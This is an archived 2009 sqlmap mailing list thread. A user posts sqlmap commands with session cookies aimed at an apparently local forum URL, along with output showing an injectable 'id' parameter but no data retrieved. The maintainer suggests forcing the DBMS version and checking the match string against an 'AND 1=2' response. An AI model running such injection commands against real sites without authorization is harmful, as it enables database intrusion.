Thread: [sqlmap-users] Blind injection possible - no output
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users
|
From: Erik N. <da...@gm...> - 2009-09-08 12:48:12
|
sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
__utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__utmb=107765125.29.10.1252406202; __utmc=107765125;
PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
--url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
--string="Secret Forum" --fingerprint
[14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable
with 0 parenthesis
[14:09:04] [INFO] testing for parenthesis on injectable parameter
[14:09:06] [INFO] the injectable parameter requires 0 parenthesis
[14:09:06] [INFO] testing MySQL
[14:09:07] [INFO] confirming MySQL
[14:09:08] [INFO] retrieved:
[14:09:10] [INFO] the back-end DBMS is MySQL
[14:09:10] [INFO] retrieved:
[14:11:28] [INFO] retrieved:
[14:11:32] [INFO] retrieved:
[14:11:35] [INFO] retrieved:
[14:11:41] [INFO] retrieved:
[14:11:46] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: active fingerprint: MySQL < 3.22.11
comment injection fingerprint: MySQL 5.0.75
[*] shutting down at: 14:12:50
sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
__utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__utmb=107765125.29.10.1252406202; __utmc=107765125;
PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
--url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
--string="Secret Forum" --current-db
[14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 pare
nthesis
[14:14:01] [INFO] testing for parenthesis on injectable parameter
[14:14:03] [INFO] the injectable parameter requires 0 parenthesis
[14:14:03] [INFO] testing MySQL
[14:14:04] [INFO] confirming MySQL
[14:14:05] [INFO] retrieved:
[14:14:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: MySQL < 5.0.0
[14:14:07] [INFO] fetching current database
[14:14:07] [INFO] retrieved:
current database: None
What to do?
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2009-09-17 16:52:16
|
Hi Erik, Try to force the back-end database software and version manually if you know it, e.g. --dbms "mysql 5" and double check that the provided string to match on is not present within any False response (eg. AND 1=2). Cheers, Bernardo On Tue, Sep 8, 2009 at 13:21, Erik Nilsson <da...@gm...> wrote: > sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2; > __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); > __utmb=107765125.29.10.1252406202; __utmc=107765125; > PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9" > --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id > --string="Secret Forum" --fingerprint > > [14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable > with 0 parenthesis > [14:09:04] [INFO] testing for parenthesis on injectable parameter > [14:09:06] [INFO] the injectable parameter requires 0 parenthesis > [14:09:06] [INFO] testing MySQL > [14:09:07] [INFO] confirming MySQL > [14:09:08] [INFO] retrieved: > [14:09:10] [INFO] the back-end DBMS is MySQL > [14:09:10] [INFO] retrieved: > [14:11:28] [INFO] retrieved: > [14:11:32] [INFO] retrieved: > [14:11:35] [INFO] retrieved: > [14:11:41] [INFO] retrieved: > [14:11:46] [INFO] executing MySQL comment injection fingerprint > web server operating system: Linux Ubuntu > web application technology: PHP 5.2.6, Apache > back-end DBMS: active fingerprint: MySQL < 3.22.11 > comment injection fingerprint: MySQL 5.0.75 > > > [*] shutting down at: 14:12:50 > > > sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2; > __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); > __utmb=107765125.29.10.1252406202; __utmc=107765125; > PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9" > --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id > --string="Secret Forum" --current-db > > [14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 pare > nthesis > [14:14:01] [INFO] testing for parenthesis on injectable parameter > [14:14:03] [INFO] the injectable parameter requires 0 parenthesis > [14:14:03] [INFO] testing MySQL > [14:14:04] [INFO] confirming MySQL > [14:14:05] [INFO] retrieved: > [14:14:07] [INFO] the back-end DBMS is MySQL > web server operating system: Linux Ubuntu > web application technology: PHP 5.2.6, Apache > back-end DBMS: MySQL < 5.0.0 > > [14:14:07] [INFO] fetching current database > [14:14:07] [INFO] retrieved: > current database: None > > > What to do? > > ------------------------------------------------------------------------------ > Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day > trial. Simplify your report design, integration and deployment - and focus on > what you do best, core application coding. Discover what's new with > Crystal Reports now. http://p.sf.net/sfu/bobj-july > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Erik N. <da...@gm...> - 2009-09-17 17:34:39
|
Thank you for your answer,
unfortunately it didn't help me.
I tried to force the back-end dbms into a number of different variations.
I also double checked that the string isn't present when using AND 1=2.
Using --fingerprint gave me no output as well. This is what I got from that run:
[19:28:54] [WARNING] the testable parameter 'id' you provided is not
into the Cookie
[19:28:54] [INFO] testing connection to the target url
[19:28:58] [INFO] testing if the provided string is within the target
URL page content
[19:28:59] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[19:28:59] [INFO] testing unescaped numeric injection on GET parameter 'id'
[19:29:03] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[19:29:04] [INFO] GET parameter 'id' is unescaped numeric injectable
with 0 parenthesis
[19:29:04] [INFO] testing for parenthesis on injectable parameter
[19:29:07] [INFO] the injectable parameter requires 0 parenthesis
[19:29:07] [INFO] the back-end DBMS is MySQL
[19:29:07] [INFO] testing MySQL
[19:29:13] [INFO] confirming MySQL
[19:29:17] [INFO] retrieved:
[19:29:25] [INFO] the back-end DBMS is MySQL
[19:29:25] [INFO] retrieved:
[19:29:34] [INFO] retrieved:
[19:29:43] [INFO] retrieved:
[19:29:49] [INFO] retrieved:
[19:29:59] [INFO] retrieved:
[19:30:06] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: active fingerprint: MySQL < 3.22.11
comment injection fingerprint: MySQL 5.0.75
[*] shutting down at: 19:32:09
On Thu, Sep 17, 2009 at 6:52 PM, Bernardo Damele A. G.
<ber...@gm...> wrote:
> Hi Erik,
>
> Try to force the back-end database software and version manually if
> you know it, e.g. --dbms "mysql 5" and double check that the provided
> string to match on is not present within any False response (eg. AND
> 1=2).
>
> Cheers,
> Bernardo
>
>
> On Tue, Sep 8, 2009 at 13:21, Erik Nilsson <da...@gm...> wrote:
>> sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
>> __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
>> __utmb=107765125.29.10.1252406202; __utmc=107765125;
>> PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
>> --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
>> --string="Secret Forum" --fingerprint
>>
>> [14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable
>> with 0 parenthesis
>> [14:09:04] [INFO] testing for parenthesis on injectable parameter
>> [14:09:06] [INFO] the injectable parameter requires 0 parenthesis
>> [14:09:06] [INFO] testing MySQL
>> [14:09:07] [INFO] confirming MySQL
>> [14:09:08] [INFO] retrieved:
>> [14:09:10] [INFO] the back-end DBMS is MySQL
>> [14:09:10] [INFO] retrieved:
>> [14:11:28] [INFO] retrieved:
>> [14:11:32] [INFO] retrieved:
>> [14:11:35] [INFO] retrieved:
>> [14:11:41] [INFO] retrieved:
>> [14:11:46] [INFO] executing MySQL comment injection fingerprint
>> web server operating system: Linux Ubuntu
>> web application technology: PHP 5.2.6, Apache
>> back-end DBMS: active fingerprint: MySQL < 3.22.11
>> comment injection fingerprint: MySQL 5.0.75
>>
>>
>> [*] shutting down at: 14:12:50
>>
>>
>> sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
>> __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
>> __utmb=107765125.29.10.1252406202; __utmc=107765125;
>> PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
>> --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
>> --string="Secret Forum" --current-db
>>
>> [14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 pare
>> nthesis
>> [14:14:01] [INFO] testing for parenthesis on injectable parameter
>> [14:14:03] [INFO] the injectable parameter requires 0 parenthesis
>> [14:14:03] [INFO] testing MySQL
>> [14:14:04] [INFO] confirming MySQL
>> [14:14:05] [INFO] retrieved:
>> [14:14:07] [INFO] the back-end DBMS is MySQL
>> web server operating system: Linux Ubuntu
>> web application technology: PHP 5.2.6, Apache
>> back-end DBMS: MySQL < 5.0.0
>>
>> [14:14:07] [INFO] fetching current database
>> [14:14:07] [INFO] retrieved:
>> current database: None
>>
>>
>> What to do?
>>
>> ------------------------------------------------------------------------------
>> Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day
>> trial. Simplify your report design, integration and deployment - and focus on
>> what you do best, core application coding. Discover what's new with
>> Crystal Reports now. http://p.sf.net/sfu/bobj-july
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: 0x05F5A30F
>
|
×
Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.
Thanks for helping keep SourceForge clean.
X